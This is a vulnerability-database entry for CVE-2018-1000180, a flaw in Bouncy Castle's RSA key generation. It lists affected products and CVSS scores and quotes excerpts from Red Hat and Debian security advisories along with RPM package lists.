https://access.redhat.com/security/cve/CVE-2017-12624 https://access.redhat.com/security/cve/CVE-2018-8039 https://access.redhat.com/security/cve/CVE-2018-10237 https://access.redhat.com/security/cve/CVE-2018-10862 https://access.redhat.com/security/cve/CVE-2018-1000180 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/?version=7.1 https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.1/html-single/installation_guide/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2018 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBW3QPgdzjgjWX9erEAQgE4g//Wjtd+suEMLP7kOcaJMTUh1dTMowt7E/E QcS7tlzQCb5jXnnLEGaNzL9f5IS+MB0weir4Q9ju9Gcwf62x9F+F4H0jgeKtyKYA iwItX1u8rG//t3kFP75Azcll0z1TjLR5I+XR1+WcMHGU3AlQhisXUVl3jcrnqWlP UZLq65lrTa4qt+8+QJSaKpAD8jTweEdWzvv8kAgYQt7uLZSpaClclsWemZuf5tap cojOFU9fFgUTiNNDYqSzfvHafrUpAoWIK5MKjF+3FJi0jfcMVuI+kuua0/gYwf4u opopohMKDY1MJVVfIxg3fl4YoIuT42u/ybsgD8ZXqbrJH6syjOptdPUf5VIr9tao /+oO2Ki5gwxPUke82U584h9klbb6DdIKcGH4+eQSe2ZkiLYmn5Yq3CvxDjKpkXfH gDJqeVpfQ717Aj0P499Rex/7ruwUrMx6Xx70HrNE8b2S3KsoN2bPqobA6OtPyx7w TmkpLyBHmn80PRS/Saejxm9nFU7bI3iliktcB2BcjnlUOWU1aqKJ2DJATTcHbxeK GaV765f0Xfnz4RyQUYuXyKRvNhic6D5tOzZ+09Fkm9rifHcRfPxSxEnGpBjWtcQx RlOs7J92EJ7v0FLnMIYzjb5QefUx+memaXcgngYoRMgqQqmpZlHOFOkTCIbi+C8x jsOwwwJAmW4=eVEP -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.6,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "webcenter portal",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "webcenter portal",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "11.1.1.9.0"
},
{
"_id": null,
"model": "soa suite",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "soa suite",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "7.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "7.0"
},
{
"_id": null,
"model": "retail convenience and fuel pos software",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "2.8.1"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "8.57"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "8.56"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "8.55"
},
{
"_id": null,
"model": "managed file transfer",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "managed file transfer",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"_id": null,
"model": "enterprise repository",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"_id": null,
"model": "communications application session controller",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "3.7.1"
},
{
"_id": null,
"model": "business transaction management",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "12.1.0"
},
{
"_id": null,
"model": "business process management suite",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "business process management suite",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"_id": null,
"model": "business process management suite",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "11.1.1.9.0"
},
{
"_id": null,
"model": "api gateway",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "11.1.2.4.0"
},
{
"_id": null,
"model": "bc-java",
"scope": "gte",
"trust": 1.0,
"vendor": "bouncycastle",
"version": "1.54"
},
{
"_id": null,
"model": "communications webrtc session controller",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "7.2"
},
{
"_id": null,
"model": "jboss enterprise application platform",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.1.0"
},
{
"_id": null,
"model": "bc-java",
"scope": "lte",
"trust": 1.0,
"vendor": "bouncycastle",
"version": "1.59"
},
{
"_id": null,
"model": "communications application session controller",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.8.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"_id": null,
"model": "virtualization",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "4.2"
},
{
"_id": null,
"model": "oncommand workflow automation",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications converged application server",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "7.0.0.1"
},
{
"_id": null,
"model": "fips java api",
"scope": "lte",
"trust": 1.0,
"vendor": "bouncycastle",
"version": "1.0.1"
},
{
"_id": null,
"model": "java cryptography api",
"scope": null,
"trust": 0.8,
"vendor": "bouncy castle",
"version": null
},
{
"_id": null,
"model": "fips java api",
"scope": null,
"trust": 0.8,
"vendor": "bouncy castle",
"version": null
},
{
"_id": null,
"model": "gnu/linux",
"scope": null,
"trust": 0.8,
"vendor": "debian",
"version": null
},
{
"_id": null,
"model": "virtualization",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "software collections for rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "0"
},
{
"_id": null,
"model": "satellite",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "openshift application runtimes",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "1.0"
},
{
"_id": null,
"model": "jboss fuse",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.3"
},
{
"_id": null,
"model": "enterprise manager for fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.3"
},
{
"_id": null,
"model": "enterprise manager for fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"_id": null,
"model": "data integrator",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "communications webrtc session controller",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.1"
},
{
"_id": null,
"model": "communications webrtc session controller",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0"
},
{
"_id": null,
"model": "communications convergence",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.0.2"
},
{
"_id": null,
"model": "communications converged application server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0"
},
{
"_id": null,
"model": "communications application session controller",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.8"
},
{
"_id": null,
"model": "fips java api",
"scope": "eq",
"trust": 0.3,
"vendor": "bouncycastle",
"version": "1.0.1"
},
{
"_id": null,
"model": "fips java api",
"scope": "eq",
"trust": 0.3,
"vendor": "bouncycastle",
"version": "1.0"
},
{
"_id": null,
"model": "bouncy castle",
"scope": "eq",
"trust": 0.3,
"vendor": "bouncycastle",
"version": "1.59"
},
{
"_id": null,
"model": "bouncy castle",
"scope": "eq",
"trust": 0.3,
"vendor": "bouncycastle",
"version": "1.54"
},
{
"_id": null,
"model": "communications webrtc session controller",
"scope": "ne",
"trust": 0.3,
"vendor": "oracle",
"version": "7.2"
},
{
"_id": null,
"model": "communications converged application server",
"scope": "ne",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0.0.1"
},
{
"_id": null,
"model": "fips java api",
"scope": "ne",
"trust": 0.3,
"vendor": "bouncycastle",
"version": "1.0.2"
},
{
"_id": null,
"model": "bouncy castle beta4",
"scope": "ne",
"trust": 0.3,
"vendor": "bouncycastle",
"version": "1.60"
}
],
"sources": [
{
"db": "BID",
"id": "106567"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-332"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006359"
},
{
"db": "NVD",
"id": "CVE-2018-1000180"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:bouncycastle:legion-of-the-bouncy-castle-java-crytography-api",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:bouncycastle:fips_java_api",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:debian:debian_linux",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006359"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat,Bernd Eckenfels",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201806-332"
}
],
"trust": 0.6
},
"cve": "CVE-2018-1000180",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2018-1000180",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-119384",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-1000180",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-1000180",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2018-1000180",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201806-332",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-119384",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-1000180",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-119384"
},
{
"db": "VULMON",
"id": "CVE-2018-1000180"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-332"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006359"
},
{
"db": "NVD",
"id": "CVE-2018-1000180"
}
]
},
"description": {
"_id": null,
"data": "Bouncy Castle BC 1.54 - 1.59, BC-FJA 1.0.0, BC-FJA 1.0.1 and earlier have a flaw in the Low-level interface to RSA key pair generator, specifically RSA Key Pairs generated in low-level API with added certainty may have less M-R tests than expected. This appears to be fixed in versions BC 1.60 beta 4 and later, BC-FJA 1.0.2 and later. Bouncy Castle BC and BC-FJA Contains a cryptographic vulnerability.Information may be obtained. Bouncy Castle is prone to a security weakness. \nSuccessfully exploiting this issue will allow attackers to perform unauthorized actions; this may aid in launching further attacks. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). \n\nThe JBoss server process must be restarted for the update to take effect. For\nfurther information, refer to the release notes linked to in the References\nsection. \n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 1.56-1+deb9u2. \n\nWe recommend that you upgrade your bouncycastle packages. \n\nFor the detailed security status of bouncycastle please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/bouncycastle\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlstVJsACgkQEMKTtsN8\nTjbYZw/+Ig5wYiaMaeNbnzRu8Je7e4jGvglWlqLeTX7xG2hpzaFHCeOFxTX9oJmt\nr/8y/wZMhf+pV3h1KlP9nxOLEhchcL4hSAM4necgVP6odykbH0Em2yAE5i7ae9ez\noD9Ib7dUUFbRk2a19J4bVdXXUjb3YQCN1SsS5KVYfWDgzxa+dC34vhm3yfNqoPej\n0sFczW7kuUUK61a9LwNmuTp8hVyvtNc5FjhK5mEB3Fi2EiYYn8UT/LNp5QElKB4i\nh7P6c1Q9jw8VSqvRqlt4n2+HAreKmOS8a61hFYFV/HFoer6rOxa03YDcC0rlva7O\na0WcOzet/IzRCOJilj2TIgXBZzFb3peyzd4arTa/VCt794qHOTIElBnmvAvVeXBW\nyu83IQrDYrKnwm85K0R3YUXaBzaGTeVPwnYPJnYRydlF/zxvg7l9xx7Cy7PJN2Xh\nY+visDrPob09QFNc4PYlzQ+V6vrFrygAPO7CJ7hY7KrF8nuhbt9Ygd75IBIMTqhZ\nQsQlAUZ8UU7q9vVPZCZFb89ks5WyRm8O7Kdn5wzEx1Egas1/jfUzfMOUYTEl0nfM\niOk0Q0pFpbwQ+9vWZBMWYTVHXUi8jabBbJcM4g9xVzlDk2mqTVaimnFXfl28Y3aK\nD8ul9kVTrOOX/jutkY46hdLOhmGo52oHDW5qiJtQL49QzC+Qm3o=\n=p+RC\n-----END PGP SIGNATURE-----\n. JIRA issues fixed (https://issues.jboss.org/):\n\nRHSSO-1429 - CVE-2018-10912 [7.2.z] Replace command might fail and cause endless loop when cache owners \u003e= 2\n\n6. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Important: Red Hat JBoss Enterprise Application Platform 7.1.4 on RHEL 6 security update\nAdvisory ID: RHSA-2018:2423-01\nProduct: Red Hat JBoss Enterprise Application Platform\nAdvisory URL: https://access.redhat.com/errata/RHSA-2018:2423\nIssue date: 2018-08-15\nCVE Names: CVE-2017-12624 CVE-2018-8039 CVE-2018-10237\n CVE-2018-10862 CVE-2018-1000180\n====================================================================\n1. Summary:\n\nAn update is now available for Red Hat JBoss Enterprise Application\nPlatform 7.1 for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat JBoss Enterprise Application Platform 7.1 for RHEL 6 Server - i386, noarch, x86_64\n\n3. Description:\n\nRed Hat JBoss Enterprise Application Platform is a platform for Java\napplications based on the JBoss Application Server. \n\nThis release of Red Hat JBoss Enterprise Application Platform 7.1.4 serves\nas a replacement for Red Hat JBoss Enterprise Application Platform 7.1.3,\nand includes bug fixes and enhancements, which are documented in the\nRelease Notes document linked to in the References. \n\nSecurity Fix(es):\n\n* guava: Unbounded memory allocation in AtomicDoubleArray and\nCompoundOrdering classes allow remote attackers to cause a denial of\nservice (CVE-2018-10237)\n\n* bouncycastle: flaw in the low-level interface to RSA key pair generator\n(CVE-2018-1000180)\n\n* cxf: Improper size validation in message attachment header for JAX-WS and\nJAX-RS services (CVE-2017-12624)\n\n* wildfly: wildfly-core: Path traversal can allow the extraction of .war\narchives to write arbitrary files (CVE-2018-10862)\n\n* cxf-core: apache-cxf: TLS hostname verification does not work correctly\nwith com.sun.net.ssl.* (CVE-2018-8039)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe\nReferences section. \n\n4. Solution:\n\nBefore applying this update, back up your existing Red Hat JBoss Enterprise\nApplication Platform installation and deployed applications. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1515976 - CVE-2017-12624 cxf: Improper size validation in message attachment header for JAX-WS and JAX-RS services\n1573391 - CVE-2018-10237 guava: Unbounded memory allocation in AtomicDoubleArray and CompoundOrdering classes allow remote attackers to cause a denial of service\n1588306 - CVE-2018-1000180 bouncycastle: flaw in the low-level interface to RSA key pair generator\n1593527 - CVE-2018-10862 wildfly-core: Path traversal can allow the extraction of .war archives to write arbitrary files (Zip Slip)\n1595332 - CVE-2018-8039 apache-cxf: TLS hostname verification does not work correctly with com.sun.net.ssl.*\n\n6. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-14787 - Tracker bug for the EAP 7.1.4 release for RHEL-6\n\n7. Package List:\n\nRed Hat JBoss Enterprise Application Platform 7.1 for RHEL 6 Server:\n\nSource:\neap7-activemq-artemis-1.5.5.013-1.redhat_1.1.ep7.el6.src.rpm\neap7-bouncycastle-1.56.0-5.redhat_3.1.ep7.el6.src.rpm\neap7-guava-libraries-25.0.0-1.redhat_1.1.ep7.el6.src.rpm\neap7-hibernate-5.1.15-1.Final_redhat_1.1.ep7.el6.src.rpm\neap7-ironjacamar-1.4.10-1.Final_redhat_1.1.ep7.el6.src.rpm\neap7-jberet-1.2.6-2.Final_redhat_1.1.ep7.el6.src.rpm\neap7-jboss-ejb-client-4.0.11-1.Final_redhat_1.1.ep7.el6.src.rpm\neap7-jboss-remoting-5.0.8-1.Final_redhat_1.1.ep7.el6.src.rpm\neap7-jboss-server-migration-1.0.6-4.Final_redhat_4.1.ep7.el6.src.rpm\neap7-mod_cluster-1.3.10-1.Final_redhat_1.1.ep7.el6.src.rpm\neap7-narayana-5.5.32-1.Final_redhat_1.1.ep7.el6.src.rpm\neap7-picketlink-bindings-2.5.5-13.SP12_redhat_1.1.ep7.el6.src.rpm\neap7-picketlink-federation-2.5.5-13.SP12_redhat_1.1.ep7.el6.src.rpm\neap7-resteasy-3.0.26-1.Final_redhat_1.1.ep7.el6.src.rpm\neap7-undertow-1.4.18-7.SP8_redhat_1.1.ep7.el6.src.rpm\neap7-wildfly-7.1.4-1.GA_redhat_1.1.ep7.el6.src.rpm\neap7-wildfly-javadocs-7.1.4-2.GA_redhat_1.1.ep7.el6.src.rpm\neap7-wildfly-naming-client-1.0.9-1.Final_redhat_1.1.ep7.el6.src.rpm\neap7-wildfly-openssl-linux-1.0.6-14.Final_redhat_1.1.ep7.el6.src.rpm\neap7-wildfly-transaction-client-1.0.4-1.Final_redhat_1.1.ep7.el6.src.rpm\neap7-wildfly-web-console-eap-2.9.18-1.Final_redhat_1.1.ep7.el6.src.rpm\n\ni386:\neap7-wildfly-openssl-linux-1.0.6-14.Final_redhat_1.1.ep7.el6.i686.rpm\neap7-wildfly-openssl-linux-debuginfo-1.0.6-14.Final_redhat_1.1.ep7.el6.i686.rpm\n\nnoarch:\neap7-activemq-artemis-1.5.5.013-1.redhat_1.1.ep7.el6.noarch.rpm\neap7-activemq-artemis-cli-1.5.5.013-1.redhat_1.1.ep7.el6.noarch.rpm\neap7-activemq-artemis-commons-1.5.5.013-1.redhat_1.1.ep7.el6.noarch.rpm\neap7-activemq-artemis-core-client-1.5.5.013-1.redhat_1.1.ep7.el6.noarch.rpm\neap7-activemq-artemis-dto-1.5.5.013-1.redhat_1.1.ep7.el6.noarch.rpm\neap7-activemq-artemis-hornetq-protocol-1.5.5.013-1.redhat_1.1.ep7.el6.noarch.rpm\neap7-activemq-artemis-hqclient-protocol-1.5.5.013-1.redhat_1.1.ep7.el6.noarch.rpm\neap7-activemq-artemis-jdbc-store-1.5.5.013-1.redhat_1.1.ep7.el6.noarch.rpm\neap7-activemq-artemis-jms-client-1.5.5.013-1.redhat_1.1.ep7.el6.noarch.rpm\neap7-activemq-artemis-jms-server-1.5.5.013-1.redhat_1.1.ep7.el6.noarch.rpm\neap7-activemq-artemis-journal-1.5.5.013-1.redhat_1.1.ep7.el6.noarch.rpm\neap7-activemq-artemis-native-1.5.5.013-1.redhat_1.1.ep7.el6.noarch.rpm\neap7-activemq-artemis-ra-1.5.5.013-1.redhat_1.1.ep7.el6.noarch.rpm\neap7-activemq-artemis-selector-1.5.5.013-1.redhat_1.1.ep7.el6.noarch.rpm\neap7-activemq-artemis-server-1.5.5.013-1.redhat_1.1.ep7.el6.noarch.rpm\neap7-activemq-artemis-service-extensions-1.5.5.013-1.redhat_1.1.ep7.el6.noarch.rpm\neap7-bouncycastle-1.56.0-5.redhat_3.1.ep7.el6.noarch.rpm\neap7-bouncycastle-mail-1.56.0-5.redhat_3.1.ep7.el6.noarch.rpm\neap7-bouncycastle-pkix-1.56.0-5.redhat_3.1.ep7.el6.noarch.rpm\neap7-bouncycastle-prov-1.56.0-5.redhat_3.1.ep7.el6.noarch.rpm\neap7-guava-25.0.0-1.redhat_1.1.ep7.el6.noarch.rpm\neap7-guava-libraries-25.0.0-1.redhat_1.1.ep7.el6.noarch.rpm\neap7-hibernate-5.1.15-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-hibernate-core-5.1.15-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-hibernate-entitymanager-5.1.15-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-hibernate-envers-5.1.15-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-hibernate-infinispan-5.1.15-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-hibernate-java8-5.1.15-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-ironjacamar-1.4.10-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-ironjacamar-common-api-1.4.10-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-ironjacamar-common-impl-1.4.10-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-ironjacamar-common-spi-1.4.10-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-ironjacamar-core-api-1.4.10-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-ironjacamar-core-impl-1.4.10-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-ironjacamar-deployers-common-1.4.10-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-ironjacamar-jdbc-1.4.10-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-ironjacamar-validator-1.4.10-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-jberet-1.2.6-2.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-jberet-core-1.2.6-2.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-jboss-ejb-client-4.0.11-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-jboss-remoting-5.0.8-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-jboss-server-migration-1.0.6-4.Final_redhat_4.1.ep7.el6.noarch.rpm\neap7-jboss-server-migration-cli-1.0.6-4.Final_redhat_4.1.ep7.el6.noarch.rpm\neap7-jboss-server-migration-core-1.0.6-4.Final_redhat_4.1.ep7.el6.noarch.rpm\neap7-jboss-server-migration-eap6.4-1.0.6-4.Final_redhat_4.1.ep7.el6.noarch.rpm\neap7-jboss-server-migration-eap6.4-to-eap7.0-1.0.6-4.Final_redhat_4.1.ep7.el6.noarch.rpm\neap7-jboss-server-migration-eap6.4-to-eap7.1-1.0.6-4.Final_redhat_4.1.ep7.el6.noarch.rpm\neap7-jboss-server-migration-eap7.0-1.0.6-4.Final_redhat_4.1.ep7.el6.noarch.rpm\neap7-jboss-server-migration-eap7.0-to-eap7.1-1.0.6-4.Final_redhat_4.1.ep7.el6.noarch.rpm\neap7-jboss-server-migration-eap7.1-1.0.6-4.Final_redhat_4.1.ep7.el6.noarch.rpm\neap7-jboss-server-migration-wildfly10.0-1.0.6-4.Final_redhat_4.1.ep7.el6.noarch.rpm\neap7-jboss-server-migration-wildfly10.0-to-eap7.1-1.0.6-4.Final_redhat_4.1.ep7.el6.noarch.rpm\neap7-jboss-server-migration-wildfly10.1-1.0.6-4.Final_redhat_4.1.ep7.el6.noarch.rpm\neap7-jboss-server-migration-wildfly10.1-to-eap7.1-1.0.6-4.Final_redhat_4.1.ep7.el6.noarch.rpm\neap7-jboss-server-migration-wildfly8.2-1.0.6-4.Final_redhat_4.1.ep7.el6.noarch.rpm\neap7-jboss-server-migration-wildfly8.2-to-eap7.0-1.0.6-4.Final_redhat_4.1.ep7.el6.noarch.rpm\neap7-jboss-server-migration-wildfly8.2-to-eap7.1-1.0.6-4.Final_redhat_4.1.ep7.el6.noarch.rpm\neap7-jboss-server-migration-wildfly9.0-1.0.6-4.Final_redhat_4.1.ep7.el6.noarch.rpm\neap7-jboss-server-migration-wildfly9.0-to-eap7.0-1.0.6-4.Final_redhat_4.1.ep7.el6.noarch.rpm\neap7-jboss-server-migration-wildfly9.0-to-eap7.1-1.0.6-4.Final_redhat_4.1.ep7.el6.noarch.rpm\neap7-mod_cluster-1.3.10-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-narayana-5.5.32-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-narayana-compensations-5.5.32-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-narayana-jbosstxbridge-5.5.32-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-narayana-jbossxts-5.5.32-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-narayana-jts-idlj-5.5.32-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-narayana-jts-integration-5.5.32-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-narayana-restat-api-5.5.32-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-narayana-restat-bridge-5.5.32-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-narayana-restat-integration-5.5.32-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-narayana-restat-util-5.5.32-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-narayana-txframework-5.5.32-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-picketlink-api-2.5.5-13.SP12_redhat_1.1.ep7.el6.noarch.rpm\neap7-picketlink-bindings-2.5.5-13.SP12_redhat_1.1.ep7.el6.noarch.rpm\neap7-picketlink-common-2.5.5-13.SP12_redhat_1.1.ep7.el6.noarch.rpm\neap7-picketlink-config-2.5.5-13.SP12_redhat_1.1.ep7.el6.noarch.rpm\neap7-picketlink-federation-2.5.5-13.SP12_redhat_1.1.ep7.el6.noarch.rpm\neap7-picketlink-idm-api-2.5.5-13.SP12_redhat_1.1.ep7.el6.noarch.rpm\neap7-picketlink-idm-impl-2.5.5-13.SP12_redhat_1.1.ep7.el6.noarch.rpm\neap7-picketlink-idm-simple-schema-2.5.5-13.SP12_redhat_1.1.ep7.el6.noarch.rpm\neap7-picketlink-impl-2.5.5-13.SP12_redhat_1.1.ep7.el6.noarch.rpm\neap7-picketlink-wildfly8-2.5.5-13.SP12_redhat_1.1.ep7.el6.noarch.rpm\neap7-resteasy-3.0.26-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-resteasy-atom-provider-3.0.26-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-resteasy-cdi-3.0.26-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-resteasy-client-3.0.26-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-resteasy-crypto-3.0.26-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-resteasy-jackson-provider-3.0.26-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-resteasy-jackson2-provider-3.0.26-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-resteasy-jaxb-provider-3.0.26-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-resteasy-jaxrs-3.0.26-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-resteasy-jettison-provider-3.0.26-1.Final_redhat_1.1.ep7.el6.noarch.rpm\neap7-resteasy-jose-jwt-3.0.26-1.Final_redhat_1.1.ep7.el6.noarch.